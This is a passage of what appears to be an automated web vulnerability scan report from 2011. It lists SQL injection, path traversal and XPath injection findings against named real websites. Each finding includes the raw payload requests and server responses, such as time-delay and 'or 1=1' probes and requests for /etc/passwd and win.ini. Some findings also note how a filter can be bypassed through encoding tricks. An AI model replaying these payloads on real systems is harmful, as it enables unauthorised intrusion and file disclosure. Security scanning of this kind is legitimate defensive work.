<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="e
...[SNIP]...

1.4. http://www.bbt.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 20086 milliseconds to respond to the request, compared with 1023 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /favicon.ico'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bbt.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 - Not Found
content-type: text/html
date: Sat, 02 Apr 2011 13:44:37 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15424
cache-control: private
x-powered-by: ASP.NET
Set-Cookie: AMWEBJCT!%2Fbbt!ASPSESSIONIDAASQCBAD=GLODNHDACIODPHHEBIKBIABD; Path=/
Set-Cookie: PD_STATEFUL_347ae440-9ca4-11da-83e0-00f81800e002=%2Fbbt; Path=/
Content-Length: 15564


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404err
...[SNIP]...

1.5. http://www.dealtime.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealtime.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dealtime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: brc=www.dealtime.com; Domain=dealtime.com; Expires=Sun, 03-Apr-2011 13:39:15 GMT; Path=/
Set-Cookie: JSESSIONID=805851EED71FF6143D9FA848ECA7CB9A; Path=/
Set-Cookie: session=ts%3D2%5EPVS%3D1; Domain=.dealtime.com; Path=/
Set-Cookie: reloadCheck=%2Ffavicon.ico%26%23039%3Bnull; Domain=.dealtime.com; Path=/
Set-Cookie: perm=countryCode%3Dus; Domain=.dealtime.com; Expires=Thu, 01-Apr-2021 13:39:15 GMT; Path=/
Set-Cookie: DealTimeUserID=Q2kuror0CK; Domain=.dealtime.com; Expires=Thu, 01-Apr-2021 13:39:15 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 02 Apr 2011 13:39:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body id="error">
...[SNIP]...

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dealtime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: brc=www0.dealtime.com; Domain=dealtime.com; Expires=Sun, 03-Apr-2011 13:39:15 GMT; Path=/
Location: http://www0.dealtime.com/favicon.ico''
Set-Cookie: session=ts%3D2; Domain=.dealtime.com; Path=/
Content-Length: 0
Date: Sat, 02 Apr 2011 13:39:15 GMT
Connection: close


1.6. http://www.essortment.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.essortment.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essortment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Content-Length: 122
Server: TornadoServer/0.1
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:35:16 GMT
Connection: close

You don't even get a site specific 404: HTTP 500: Internal Server Error ({
"GrammarParsingError": "Invalid CQL : '"
})

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essortment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: TornadoServer/0.1
Date: Sat, 02 Apr 2011 13:35:17 GMT
Content-Length: 14756
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

1.7. http://www.ftd.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 13030870'%20or%201%3d1--%20 and 13030870'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico13030870'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ftd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 419
Date: Sat, 02 Apr 2011 13:47:27 GMT
X-Varnish: 1965658938
Age: 14
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 1965658938</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /favicon.ico13030870'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ftd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=BF7AFCBE5D2F105D000DE46EBF25E07E; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=BF7AFCBE5D2F105D000DE46EBF25E07E; Path=/; Domain=.ftd.com; expires=Sat, 02-04-2021 13:47:27 GMT
Vary: Accept-Encoding
X-Accelerator-Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-VR-Note: no-gzip: UA=curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 80223
Date: Sat, 02 Apr 2011 13:47:28 GMT
X-Varnish: 1841592671
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20101223/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our oner
...[SNIP]...

1.8. http://www.guitarcenter.com/favicon.ico [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.guitarcenter.com
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527
Host: www.guitarcenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
SN: 88
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:15:08 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527%2527
Host: www.guitarcenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:15:10 GMT
Server: Microsoft-IIS/6.0
ETag:
SN: 27
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=ouzuzrhrhudggjo104yitfb0; path=/; HttpOnly
Set-Cookie: ref=; path=/
Set-Cookie: ref_d=4/2/2011 10:15:10 AM; path=/
Set-Cookie: source=; path=/
Set-Cookie: ad_id=; path=/
Set-Cookie: orig_ref=; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: orig_ref_d=4/2/2011 10:15:10 AM; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: orig_source=; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: orig_ad_id=; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: uid=2e7cae34-cedd-47d9-9f54-c586e23e3b35; expires=Mon, 02-May-2011 14:15:10 GMT; path=/
Set-Cookie: IsLoyaltyAvailable=False; expires=Mon, 02-May-2011 14:15:10 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__htmHead"><s
...[SNIP]...

1.9. http://www.inc.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.inc.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 02 Apr 2011 14:21:04 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.11
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from VoxCAST
Connection: close

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:21:05 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.11
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from VoxCAST
Content-Length: 39399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="h
...[SNIP]...

1.10. http://www.psu.edu/favicon.ico [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.psu.edu
Path:   /favicon.ico

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.psu.edu
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:04:38 GMT
Server: Apache/1.3.41 (Unix)
Content-Type: text/html
Content-Length: 5468

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</a> &gt; Error 404 - Page not found
           <!-- InstanceEndEditable -->
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.psu.edu
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:38 GMT
Server: Apache/1.3.37 (Unix)
Last-Modified: Wed, 08 Jun 2005 11:51:35 GMT
ETag: "135d-400-42a6dbc7"
Accept-Ranges: bytes
Content-Length: 1024
Content-Type: image/x-icon

.PNG
...[SNIP]...

1.11. http://www.psu.edu/favicon.ico [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.psu.edu
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3'
Host: www.psu.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:04:30 GMT
Server: Apache/1.3.41 (Unix)
Content-Type: text/html
Content-Length: 5468

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</a> &gt; Error 404 - Page not found
           <!-- InstanceEndEditable -->
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3''
Host: www.psu.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:30 GMT
Server: Apache/1.3.37 (Unix)
Last-Modified: Wed, 08 Jun 2005 11:51:35 GMT
ETag: "135d-400-42a6dbc7"
Accept-Ranges: bytes
Content-Length: 1024
Content-Type: image/x-icon

.PNG
...[SNIP]...

1.12. http://www.scholastic.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.scholastic.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 11468862'%20or%201%3d1--%20 and 11468862'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico11468862'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.scholastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.64
Content-Type: text/html
X-Powered-By: ASP.NET
Location: http://www2.scholastic.com/browse/lessonplan.jsp?id=483
Content-Length: 0
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:54:12 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSDACTBQ=JOFOAFGDDIPFMOBAKFPNGCPM; path=/
Cache-Control: private

Request 2

GET /favicon.ico11468862'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.scholastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 5443
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:54:12 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSDACTBQ=KOFOAFGDFDKJCCJFLLJDMEJO; path=/
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Error Page</title>
<link rel="stylesheet" href="/css/header.css" type="text/css">
<script type="text/javascript" type="text/javascript" src="/menu/templates/global.js"></script>
<!-- MSN -->
<script type="text/javascript" src="/menu/templates/msnkids.js"></script>
<!-- /MSN -->
</head>
<body >

<div id="schlPageWrapper">

<script type="text/javascript">imgRoot = "/universal/images/";</script>
<script type="text/javascript" src="/universal/universal.js"></script>


<div id="schlPageContent">

<div id="schlHeader">

<table border="0" cellpadding="0" cellspacing="0" id="innerHeader">
<tr valign="bottom">
<td id="schlChannel">&nbsp;</td>
<td>
<div id="schlSearchBox">
<form name="searchForm" action=" http://www2.scholastic.com/browse/search" method="get" onsubmit="return setItHead();"><div id="gSearch">
               <table border="0" cellpadding="0" cellspacing="0" width="278">
       <tr>
       <td id="txtSearch"><input type="text" size="20" name="query" value="" class="txtSearch" /></td>
       <td><input type="image" src="/images/nav3.o/btnNavSearch.gif" border="0" class="btnSearch" alt="Search" /></td>
       </tr>
       </table>
   </div>            
       
   </form>
</div>
</td>
</tr>
</table>


</div><!-- /header -->


<div id="schlMainContent">

<div id="schlContent">

<!--div id="schlSkyscraper">&nbsp;</div-->

<div id="schlLegacy">
<img src="/images/nav3.o/wrapper_box_top.jpg" width="743" height="12" alt="" class="dBlock" />
<div class="box743Borders">
<!--begin page content-->

<!-- REQUEST URI: /404error.asp -->
<!-- curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 -->
<!-- generic.html -->


<!-- ORIGINAL BODY TAG --
...[SNIP]...

2. File path traversal
There are 4 instances of this issue:


2.1. http://www.bodybuilding.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bodybuilding.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload favicon.ico../../../../../../../../etc/passwd%00favicon.ico was submitted in the REST URL parameter 1. The requested file was returned in the application's response.

Request

GET /favicon.ico../../../../../../../../etc/passwd%00favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bodybuilding.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny3
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:40:37 GMT
Content-Length: 30357
Connection: close

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
<html>
<head>
<!-- Rawberry -->
<title>Bodybuilding.com - PAGE NOT FOUND! 404 Error.</title>
<meta name
...[SNIP]...
server=""
s.channel="root"
s.products=""
s.prop30="B"
s.eVar30="B"
s.prop41="Anonymous"
s.eVar41="Anonymous"
s.prop1="Fun: Article"
s.eVar1="Fun: Article"
s.prop2="Article"
s.eVar2="Article"
s.prop33="Root: PAGE NOT FOUND! 404 Error."
s.eVar33="Root: PAGE NOT FOUND! 404 Error."
s.events="event3"
s.pageType=""
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_cod
...[SNIP]...

2.2. http://www.buzzfeed.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.buzzfeed.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload favicon.ico../../../../../../../../etc/passwd%00favicon.ico was submitted in the REST URL parameter 1. The requested file was returned in the application's response.

Request

GET /favicon.ico../../../../../../../../etc/passwd%00favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzfeed.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:37:18 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 02 Apr 2011 13:00:01 GMT
ETag: "1190105-69e2-49fef1ab65640"
Accept-Ranges: bytes
Content-Length: 27106
Vary: Accept-Encoding,User-Agent
X-BuzzFeed: feed5
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<script type="text/javascript">
fb_is_enabled = false;

fb_is_enabled = true;


var BF_STATIC = {static_root: 'http://s-ak.buzzfed.com/static', image_root: 'http://s-ak.buzzfed.com', web_root: '', version: '1301693588', facebook_enabled: fb_is_enabled, fb_app_id:'45075597673', fb_api_key: 'c11330e934b70cdeed6
...[SNIP]...

2.3. http://www.cabelas.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cabelas.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload favicon.ico../../../../../../../../etc/passwd%00favicon.ico was submitted in the REST URL parameter 1. The requested file was returned in the application's response.

Request

GET /favicon.ico../../../../../../../../etc/passwd%00favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cabelas.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 02 Apr 2011 07:00:02 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=604800
Date: Sat, 02 Apr 2011 13:32:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html >
       <head>
       <title>Cabela's - Page Not Found</title>
       <!--[if lt IE
...[SNIP]...
<li class="heading">Other Ways to Shop Home &amp; Cabin:</li>
...[SNIP]...

2.4. http://www.info.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.info.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload favicon.ico..\..\..\..\..\..\..\..\..\..\winnt\win.ini was submitted in the REST URL parameter 1. The requested file was returned in the application's response.

Request

GET /favicon.ico..\..\..\..\..\..\..\..\..\..\winnt\win.ini HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.info.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.218CKMLM; path=/
Date: Sat, 02 Apr 2011 13:42:41 GMT
Server: Apache
Set-Cookie: a=newwindow+1+dpcollation_web+1+lang+0+familyfilter+1+bold+1+msRecentSearches+off+autocorrect+0+domain+infocom+ts+1301751761+last_cmp++engineset+int-only; expires=Wed, 01-Apr-2037 20:50:37 GMT; path=/; domain=.info.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 52097

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - favicon.ico....................winntwin.ini - www.Info.com</title><link rel="shortcut icon" href="http:
...[SNIP]...
020039722EE73D3D91B91E26214CF" target="_blank" title="http://forum.emsisoft.com/Default.aspx?g=posts&t=6235" class=d>... PROGRA~1\Skype\Toolbars\INTERN~1\favicon.ico O9 - Extra ... Displaying WIN.INI: ; for 16-bit app support [fonts] ... C:\WINNT\PCHealth\HelpCtr\Binaries: ...</a>
...[SNIP]...

3. XPath injection
There are 4 instances of this issue:


3.1. http://www.cartoonnetwork.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cartoonnetwork.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:45:44 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 29979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

3.2. http://www.ning.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ning.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ning.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
X-XN-Trace-Token: 035d4f9a-70d6-4175-ab94-68258d4901cd
Server: Ning HTTP Server 2.0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=2888191c-8dd6-4fbf-b6df-ac955ebc0b1e;Path=/;Domain=.ning.com;Expires=Tue, 30-Mar-21 13:26:00 GMT
